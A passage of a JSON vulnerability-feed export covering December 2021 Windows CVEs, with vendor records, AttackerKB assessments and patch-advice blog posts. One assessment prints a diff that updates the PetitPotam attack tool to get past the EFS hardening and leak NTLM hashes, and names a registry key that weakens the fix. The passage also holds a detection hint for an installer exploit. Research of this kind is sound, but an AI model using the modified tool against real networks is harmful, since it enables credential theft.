"id": "MS:CVE-2021-43893", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-43893", "cvss": {"score": 6.0, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2023-07-28T21:09:53", "description": "Windows Installer Elevation of Privilege Vulnerability", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-12-14T08:00:00", "type": "mscve", "title": "Windows Installer Elevation of Privilege Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-43883"], "modified": "2021-12-16T08:00:00", "id": "MS:CVE-2021-43883", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-43883", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}], "attackerkb": [{"lastseen": "2023-05-25T17:12:11", "description": "Windows Common Log File System Driver Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-43207.\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-01-10T00:00:00", "type": "attackerkb", "title": "CVE-2021-43226", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-43207", "CVE-2021-43226"], "modified": "2022-01-10T00:00:00", "id": "AKB:AD5F7FFA-4295-4256-8EF5-3E6DC4976F5A", "href": "https://attackerkb.com/topics/TEI2mocciC/cve-2021-43226", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-07-05T17:14:14", "description": "Windows Common Log File System Driver Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-43226.\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-01-10T00:00:00", "type": "attackerkb", "title": "CVE-2021-43207", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-43207", "CVE-2021-43226"], "modified": "2022-01-10T00:00:00", "id": "AKB:BA171561-288B-4EEE-B6AB-DFF85B36A783", "href": "https://attackerkb.com/topics/YGluZmOq9K/cve-2021-43207", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-09-18T23:33:20", "description": "Windows LSA Spoofing Vulnerability\n\n \n**Recent assessments:** \n \n**jbaines-r7** at January 25, 2022 4:35pm UTC reported:\n\nRecently, I was attempting to combine James Forshaw\u2019s [remote EFSRPC file write \u201cbug\u201d](<https://twitter.com/tiraniddo/status/1481633916507209737>) with a local privilege escalation that I\u2019d discovered. I was getting strange results. Working on one system, but not another at the same patch level. I\u2019d seriously polluted that environment with Windows Endpoint Manager, so I decided to spin up a fresh AD environment in hopes of establishing a trustworthy baseline.\n\nOnce I\u2019d stood up the new AD environment, and patched everything completely (through January 2022), I retested my proof of concept and was\u2026 unhappy and more than a bit confused with the result. Seeking additional feedback, I grabbed PetitPotam off the shelf since it\u2019s a simpler attack. But that didn\u2019t work either! That\u2019s when I found the following in the event log.\n\n![EFS Error](https://raw.githubusercontent.com/jbaines-r7/attackerkb_images/59c51ac3e642e8a46278d0453365a79ca7fef2c5/KB5009763/efs_error.png)\n\nWhich lead me to [KB5009763: EFS security hardening changes in CVE-2021-43217](<https://support.microsoft.com/en-au/topic/kb5009763-efs-security-hardening-changes-in-cve-2021-43217-719fbc9d-ad9b-4f90-a964-0afe40338002>). [CVE-2021-43217](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-43217>) is a buffer overflow affecting EFS, but it isn\u2019t related to what I was attempting to do. Regardless, the way Microsoft decided to address this CVE was to require EFSRPC clients to use packet-level privacy, and, at the time of testing, the PetitPotam proof of concept didn\u2019t.\n\nWe can further prove that out by creating the registry key mentioned by the KB to disable this behavior: HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EFS\\AllowAllCliAuth. Setting this key to \u20181\u2019 allows PetitPotam to successfully leak the NTLM hash, but it also leaves this log message:\n\n![EFS Error](https://raw.githubusercontent.com/jbaines-r7/attackerkb_images/59c51ac3e642e8a46278d0453365a79ca7fef2c5/KB5009763/efs_warning.png)\n\nGreat! PetitPotam still works, but this registry key is unlikely to be enabled in the wild. It doesn\u2019t even exist by default!\n\nThe obvious solution is just to enable privacy level authentication in PetitPotam. That happens to be quite trivial. Just use the [`RpcBindingSetAuthInfo`](<https://docs.microsoft.com/en-us/windows/win32/api/rpcdce/nf-rpcdce-rpcbindingsetauthinfow>) function after the binding handle has been created. The following is a patch I added to my local PetitPotam to test enabling privacy level authentication.\n \n \n albinolobster@ubuntu:~/PetitPotam$ cat diff \n diff --git a/PetitPotam/PetitPotam.cpp b/PetitPotam/PetitPotam.cpp\n index 1885eb2..debbd1e 100644\n --- a/PetitPotam/PetitPotam.cpp\n +++ b/PetitPotam/PetitPotam.cpp\n @@ -1,6 +1,7 @@\n // PetitPotam.cpp : Ce fichier contient la fonction 'main'. L'ex\u00e9cution du programme commence et se termine \u00e0 cet endroit.\n // Author: GILLES Lionel aka topotam (@topotam77)\n \n +#include <string>\n #include <stdio.h>\n #include <tchar.h>\n #include <assert.h>\n @@ -60,6 +61,18 @@ handle_t Bind(wchar_t* target)\n \t\twprintf(L\"Error in RpcBindingFromStringBindingW\\n\");\n \t\treturn(0);\n \t}\n +\n +\tstd::wstring spn(L\"HOST/\");\n +\tspn.append(target);\n +\n +\tRpcStatus = RpcBindingSetAuthInfoW(BindingHandle, reinterpret_cast<RPC_WSTR>(&spn[0]), RPC_C_AUTHN_LEVEL_PKT_PRIVACY,\n +\t\tRPC_C_AUTHN_GSS_NEGOTIATE, nullptr, RPC_C_AUTHZ_NONE);\n +\tif (RpcStatus != 0)\n +\t{\n +\t\twprintf(L\"Error in RpcBindingFromStringBindingW\\n\");\n +\t\treturn(0);\n +\t}\n +\n \t\n \tRpcStringFreeW(&StringBinding);\n \n\nNote the use of `RPC_C_AUTHN_LEVEL_PKT_PRIVACY` for the `AuthnLevel`. This small change is all that is needed to make PetitPotam work again.\n\nBecause I experienced a weird update in one of my AD environments, I figured a video demonstrating all of the above would be useful. You can find the video on [here](<https://share.vidyard.com/watch/s12ar9ni6fGLBwdnSW1ywn?>).\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 3\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-08-12T00:00:00", "type": "attackerkb", "title": "CVE-2021-36942", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-36942", "CVE-2021-43217"], "modified": "2021-08-21T00:00:00", "id": "AKB:1196BAF9-A467-480D-A40C-F3E93D5888D6", "href": "https://attackerkb.com/topics/TEBmUAfeCs/cve-2021-36942", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-05-23T17:18:04", "description": "Windows Installer Elevation of Privilege Vulnerability\n\n \n**Recent assessments:** \n \n**NinjaOperator** at November 22, 2021 3:59pm UTC reported:\n\nAccording to Florian Roth: \u201cYou can detect the exploitation of Windows InstallerFileTakeOver LPE CVE-2021-41379 with the published PoC with events from the \u2018Application\u2019 Eventlog \nSearch for EventID 1033 and the keyword \u2018test pkg\u2019 \n<https://twitter.com/cyb3rops/status/1462711685484101634>\n\n**jbaines-r7** at December 03, 2021 7:27pm UTC reported:\n\nAccording to Florian Roth: \u201cYou can detect the exploitation of Windows InstallerFileTakeOver LPE CVE-2021-41379 with the published PoC with events from the \u2018Application\u2019 Eventlog \nSearch for EventID 1033 and the keyword \u2018test pkg\u2019 \n<https://twitter.com/cyb3rops/status/1462711685484101634>\n\n**gwillcox-r7** at November 24, 2021 9:16pm UTC reported:\n\nAccording to Florian Roth: \u201cYou can detect the exploitation of Windows InstallerFileTakeOver LPE CVE-2021-41379 with the published PoC with events from the \u2018Application\u2019 Eventlog \nSearch for EventID 1033 and the keyword \u2018test pkg\u2019 \n<https://twitter.com/cyb3rops/status/1462711685484101634>\n\nAssessed Attacker Value: 4 \nAssessed Attacker Value: 4Assessed Attacker Value: 4\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-10T00:00:00", "type": "attackerkb", "title": "CVE-2021-41379", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41379", "CVE-2021-41739", "CVE-2021-41773", "CVE-2021-43883"], "modified": "2022-07-13T00:00:00", "id": "AKB:FE7E2037-F0E0-48D7-8F74-C9682BC04A73", "href": "https://attackerkb.com/topics/7LstI2clmF/cve-2021-41379", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "malwarebytes": [{"lastseen": "2021-12-22T08:37:15", "description": "For anyone about to sit back after checking their environment for the [Log4j](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/12/log4j-zero-day-log4shell-arrives-just-in-time-to-ruin-your-weekend/>) vulnerabilities and applying patches where needed, here are some more things that need patching.\n\n## Microsoft\n\nIn 2021\u2019s final Patch Tuesday, Microsoft included a total of 67 fixes for security vulnerabilities. The total set of updates includes patches for six publicly known bugs and seven critical security vulnerabilities.\n\nPublicly disclosed computer security flaws are listed in the Common Vulnerabilities and Exposures (CVE) database. Its goal is to make it easier to share data across separate vulnerability capabilities (tools, databases, and services). Let\u2019s have a look at the most interesting ones that were patched in this Patch Tuesday update.\n\n[CVE-2021-42310](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42310>) Microsoft Defender for IoT Remote Code Execution vulnerability. Due to a flaw in the password reset request process, an attacker can reset someone else\u2019s password. The attack may be launched remotely. No form of authentication is required for exploitation.\n\n[CVE-2021-43905](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-43905>) Microsoft Office app Remote Code Execution vulnerability. This vulnerability was rated 9.6 out of 10 on the [CVSS](<https://blog.malwarebytes.com/malwarebytes-news/2020/05/how-cvss-works-characterizing-and-scoring-vulnerabilities/>) vulnerability-severity scale, and Microsoft thinks it is likely to be exploited.\n\n[CVE-2021-43899](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-43899>) Microsoft 4K Wireless Display Adapter Remote Code Execution vulnerability. This vulnerability was rated 9.8 out of 10 on the CVSS vulnerability-severity scale, even though Microsoft says it's not likely to be exploited. You will need to install the Microsoft Wireless Display Adapter app from the Microsoft Store onto a system connected to the Microsoft 4K Wireless Display Adapter. Once installed, use the **Update & security** section of the app to download and install the latest firmware.\n\n[CVE-2021-43890](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-43890>) Windows AppX Installer Spoofing vulnerability. This vulnerability allows an attacker to create a malicious package file and then modify it to look like a legitimate application. We [reported](<https://blog.malwarebytes.com/ransomware/2021/12/emotet-being-spread-via-malicious-windows-app-installer-packages/>) on this vulnerability being used in the wild by Emotet (among others).\n\n[CVE-2021-43883](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-43883>) Windows Installer Elevation of Privilege vulnerability. This is a [patch to patch a bypassed patch in Windows Installer](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/11/windows-installer-vulnerability-becomes-actively-exploited-zero-day/>) that was initially fixed in November. By exploiting this vulnerability, threat actors that already have limited access to compromised systems can elevate their privileges and use these privileges to spread laterally within a target network.\n\n[CVE-2021-43215](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-43215>) iSNS Server Memory Corruption vulnerability can lead to remote code execution (RCE). An attacker could send a specially crafted request to the Internet Storage Name Service (iSNS) server, which could result in an RCE. The Internet Storage Name Service (iSNS) protocol is used for interaction between iSNS servers and iSNS clients.\n\n[CVE-2021-43217](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-43217>) Windows Encrypting File System (EFS) Remote Code Execution vulnerability. An attacker could cause a buffer overflow write leading to unauthenticated non-sandboxed code execution. Microsoft is addressing the vulnerability in a phased two-part rollout. These updates address the vulnerability by modifying how EFS makes connections from client to server. When the second phase of Windows updates become available in Q1 2022, customers will be notified via a revision to the security vulnerability.\n\n[CVE-2021-41333](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-41333>) Windows Print Spooler Elevation of Privilege vulnerability. Exploit code for this vulnerability is available and the code works in most situations where the vulnerability exists., which makes it a priority to fix, even if we haven\u2019t seen any attacks using this in the wild.\n\n### Apple\n\nApple has also published security updates. The update includes fixes for the remote jail-breaks that were demonstrated at the [TianfuCup](<http://www.tianfucup.com/en>) in October.\n\nApple has issued security updates for the WebKit in [Safari 15.2](<https://support.apple.com/en-us/HT212982>) and for a total of 42 vulnerabilities in [iOS 15.2 and iPadOS 15.2](<https://support.apple.com/en-us/HT212976>). Included in the patches were several security vulnerabilities that allowed anyone with physical access to a device to view contacts on a locked device, and to view stored passwords without authentication.\n\n### Others\n\nOther vendors that issued updates to keep an eye on were:\n\n * Google (Chrome)\n * Adobe\n * SAP\n * Apache, Cisco, vmWare, UniFi, and probably others as well, issued Log4j related patches.\n\nStay safe, everyone!\n\nThe post [After Log4j, December's Patch Tuesday has snuck up on us](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/12/after-log4j-decembers-patch-tuesday-has-snuck-up-on-us/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-12-16T10:47:28", "type": "malwarebytes", "title": "After Log4j, December\u2019s Patch Tuesday has snuck up on us", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41333", "CVE-2021-42310", "CVE-2021-43215", "CVE-2021-43217", "CVE-2021-43883", "CVE-2021-43890", "CVE-2021-43899", "CVE-2021-43905"], "modified": "2021-12-16T10:47:28", "id": "MALWAREBYTES:814AB3EE714524998329C30E8008B730", "href": "https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/12/after-log4j-decembers-patch-tuesday-has-snuck-up-on-us/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "qualysblog": [{"lastseen": "2021-12-22T16:37:15", "description": "### Microsoft Patch Tuesday \u2013 December 2021 \n\nMicrosoft patched 83 vulnerabilities in their December 2021 Patch Tuesday release, of which seven (7) are rated as critical severity. This month's release includes one (1) Zero Day known to be actively exploited. \n\nProducts impacted by Microsoft's December security update include Microsoft Office, Microsoft PowerShell, the Chromium-based Edge browser, the Windows Kernel, Print Spooler, and Remote Desktop Client. \n\nMicrosoft has fixed problems in software including Remote Code Execution (RCE) vulnerabilities, privilege escalation security flaws, spoofing bugs, and denial-of-service issues. \n\n#### Microsoft Vulnerabilities to be Prioritized and Patched\u2026Quickly. \n\n[**CVE-2021-43890**](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-43890>)** | Windows AppX Installer Spoofing Vulnerability** \n\nThis vulnerability CVSS 7.1 is a Zero-Day known to be an actively exploited spoofing vulnerability in the AppX installer that affects Microsoft Windows. Microsoft is aware of attacks that attempt to exploit this vulnerability by using specially crafted packages that include the malware family known as Emotet/Trickbot/Bazaloader. \n\nAn attacker could craft a malicious attachment to be used in phishing campaigns. The attacker would then have to convince the user to open the specially crafted attachment. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights. \n\n[**CVE-2021-43215**](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-43215>)** | iSNS Server Memory Corruption Vulnerability Can Lead to Remote Code Execution** \n\nThis is a Remote Code Execution (RCE) vulnerability targeting the Internet Storage Name Service (iSNS) protocol. iSNS is used for interaction between iSNS servers and iSNS clients. An attacker could send a specially crafted request to the Internet Storage Name Service (iSNS) server, which could result in remote code execution. At CVSS 9.8, this critical vulnerability should be prioritized and patched quickly. \n\n[**CVE-2021-43217**](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-43217>)** | Windows Encrypting File System (EFS) Remote Code Execution Vulnerability** \n\nThis is a Remote Code Execution (RCE) vulnerability targeting Encrypting File System (EFS) where an attacker could cause a buffer overflow write leading to unauthenticated non-sandboxed code execution, and with a CVSS score of 8.1, its important to patch quickly. \n\nMicrosoft is addressing the vulnerability in a phased two-part rollout. These updates address the vulnerability by modifying how EFS makes connections from client to server. \n\nFor guidelines on how to manage the changes required for this vulnerability and more information on the phased rollout, see [KB5009763: EFS security hardening changes in CVE-2021-43217](<https://support.microsoft.com/help/5009763>). \n\nWhen the second phase of Windows updates becomes available in Q1 2022, customers will be notified via a revision to this security vulnerability. If you wish to be notified when these updates are released, we recommend that you register for the security notifications mailer to be alerted of content changes to this advisory. See [Microsoft Technical Security Notifications](<https://www.microsoft.com/en-us/msrc/technical-security-notifications>). \n\n[**CVE-2021-43905**](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-43905>)** | Microsoft Office app Remote Code Execution Vulnerability** \n\nThis is an unauthenticated Remote Code Execution (RCE) vulnerability in the Microsoft Office app, important to patch quickly, as it has a high CVSS score of 9.6. \n\n[**CVE-2021-41333**](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-41333>)** | Windows Print Spooler Elevation of Privilege Vulnerability** \n\nThis Windows Print Spooler Elevation of Privilege vulnerability has been made public and has low attack complexity, along with a CVSS score of 7.8, which necessitates patching quickly. \n\n[**CVE-2021-43233**](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-43233>)** | Remote Desktop Client Remote Code Execution Vulnerability** \n\nThis is a critical Remote Code Execution (RCE) vulnerability included in the monthly rollup for Windows, with a CVSS score of 7.5, this too tops the list of vulnerabilities needing to be patched quickly. \n\n### Adobe Patch Tuesday \u2013 December 2021 \n\nAdobe released 11 product security updates that addressed 60 CVEs this [Patch Tuesday](<https://helpx.adobe.com/security.html>), and 28 of the CVEs are rated as critical severity impacting Adobe After Effects, Dimension, Experience Manager, Media Encoder, Photoshop, Prelude, and Premiere Pro and Rush products. \n\n### Discover and Prioritize Patch Tuesday Vulnerabilities in VMDR \n\nQualys VMDR automatically detects new Patch Tuesday vulnerabilities using continuous updates to its Knowledge Base (KB). \n\nYou can see all your impacted hosts by these vulnerabilities using the following QQL query: \n\n`vulnerabilities.vulnerability:(qid:`91850` OR qid:`91848` OR qid:`91847` OR qid:`91846` OR qid:`91845` OR qid:`91844` OR qid:`91843` OR qid:`376166` OR qid:`376164` OR qid:`376163` OR qid:`376161` OR qid:`110397` OR qid:`110396`) ` ![](https://blog.qualys.com/wp-content/uploads/2021/12/vulnerabilities-1070x510.png)\n\n### **Respond by Patching** \n\nVMDR rapidly remediates Windows hosts by deploying the most relevant and applicable per-technology version patches. You can simply select respective QIDs in the Patch Catalog and filter on the \u201cMissing\u201d patches to identify and deploy the applicable, available patches in one go. \n\nThe following QQL will return the missing patches pertaining to this Patch Tuesday. \n\n`(qid:`91850` OR qid:`91848` OR qid:`91847` OR qid:`91846` OR qid:`91845` OR qid:`91844` OR qid:`91843` OR qid:`376166` OR qid:`376164` OR qid:`376163` OR qid:`376161` OR qid:`110397` OR qid:`110396`) ` ![](https://blog.qualys.com/wp-content/uploads/2021/12/patch-catalog-1070x510.png)\n\n### Patch Tuesday Dashboard\n\nThe current updated Patch Tuesday dashboards are available in [Dashboard Toolbox: 2021 Patch Tuesday Dashboard.](<https://success.qualys.com/discussions/s/article/000006755>)\n\n### Webinar Series: This Month in Vulnerabilities and Patches\n\nTo help customers leverage the seamless integration between Qualys VMDR and Patch Management and reduce the median time to remediate critical vulnerabilities, the Qualys Research team is hosting a monthly webinar series [This Month in Vulnerabilities and Patches](<https://event.on24.com/wcc/r/3509444/01AB8685B078D8E9469DE21953BD584F>).\n\nWe discuss some of the key vulnerabilities disclosed in the past month and how to patch them:\n\n * Microsoft Patch Tuesday, December 2021\n * Adobe Patch Tuesday, December 2021\n\n[Join us live or watch on demand!](<https://gateway.on24.com/wcc/eh/3347108/category/97049/patch-tuesday>)\n\n![](https://blog.qualys.com/wp-content/uploads/2021/10/Picture1-1.png)Thursday, December 16, 2021 or later on demand\n\n### About Patch Tuesday\n\nPatch Tuesday QIDs are published at [Security Alerts](<https://www.qualys.com/research/security-alerts/>), typically late in the evening of [Patch Tuesday](<https://blog.qualys.com/tag/patch-tuesday>), followed shortly after by [PT dashboards](<https://success.qualys.com/discussions/s/article/000006505>).\n\n### Contributor\n\n[Bharat Jogi](<https://blog.qualys.com/author/bharat_jogi>), Director, Vulnerability and Threat Research, Qualys", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-12-14T22:08:33", "type": "qualysblog", "title": "Microsoft & Adobe Patch Tuesday (December 2021) \u2013 Microsoft 83 Vulnerabilities with 7 Critical, 1 Actively Exploited. Adobe 60 Vulnerabilities, 28 critical.", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41333", "CVE-2021-43215", "CVE-2021-43217", "CVE-2021-43233", "CVE-2021-43890", "CVE-2021-43905"], "modified": "2021-12-14T22:08:33", "id": "QUALYSBLOG:02535C1172C0E3693DB4E76BB1CCA660", "href": "https://blog.qualys.com/category/vulnerabilities-threat-research", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "avleonov": [{"lastseen": "2022-01-13T09:27:01", "description": "Hello everyone! It's even strange to talk about other vulnerabilities, while everyone is so focused on vulnerabilities in log4j. But life doesn't stop. Other vulnerabilities appear every day. And of course, there are many critical ones among them that require immediate patching. This episode will be about Microsoft Patch Tuesday for December 2021.\n\nI will traditionally use my open source [Vulristics](<https://github.com/leonov-av/vulristics>) tool for analysis.\n\nI run Vulristics like this:\n\n`python3.8 vulristics.py --report-type \"ms_patch_tuesday\" --mspt-year 2021 --mspt-month \"December\" --rewrite-flag \"True\"`\n\nAnd get a report:\n\n[ms_patch_tuesday_december2021_report_with_comments_ext_img.html](<https://avleonov.com//vulristics_reports/ms_patch_tuesday_december2021_report_with_comments_ext_img.html>)\n\nOf course, everything was not entirely smooth. I had to make changes to the script for receiving comments from Tenable, a connector for Microsoft, and edit the detections of products and vulnerability types.\n\nThere were 72 vulnerabilities in total. If you look at CVSS only, then 5 will be critical. According to my metric there were no critical vulnerabilities. This is primarily because there were no vulnerabilities with public exploits.\n\nIt was not possible to clearly define the type for one vulnerability. I left it as it is. "Insufficient data validation" can mean anything.\n\nThe most critical vulnerability is **Spoofing in Windows AppX Installer (CVE-2021-43890).** AppX installer is used to install AppX apps on Windows 10 systems. It has been linked to attacks associated with the Emotet/TrickBot/Bazaloader family. To exploit this vulnerability, an attacker would need to convince a user to open a malicious attachment, for example, through a phishing attack. It seems that code execution would occur at the logged-on user level, so attackers would likely combine this with another bug to take control of a system.\n\nThe next most critical vulnerability is **Remote Code Execution in iSNS Server (CVE-2021-43215)**. "This patch fixes a bug in the Internet Storage Name Service (iSNS) server that could allow remote code execution if an attacker sends a specially crafted request to an affected server. If you aren\u2019t familiar with it, iSNS is a protocol that enables automated discovery and management of iSCSI devices on a TCP/IP storage network. In other words, if you\u2019re running a SAN in your enterprise, you either have an iSNS server or you configure each of the logical interfaces individually."\n\nFurther, the prioritization is not so obvious. **Remote Code Execution in Windows Encrypting File System (CVE-2021-43217)**. "An attacker could cause a buffer overflow write leading to unauthenticated non-sandboxed code execution". It looks 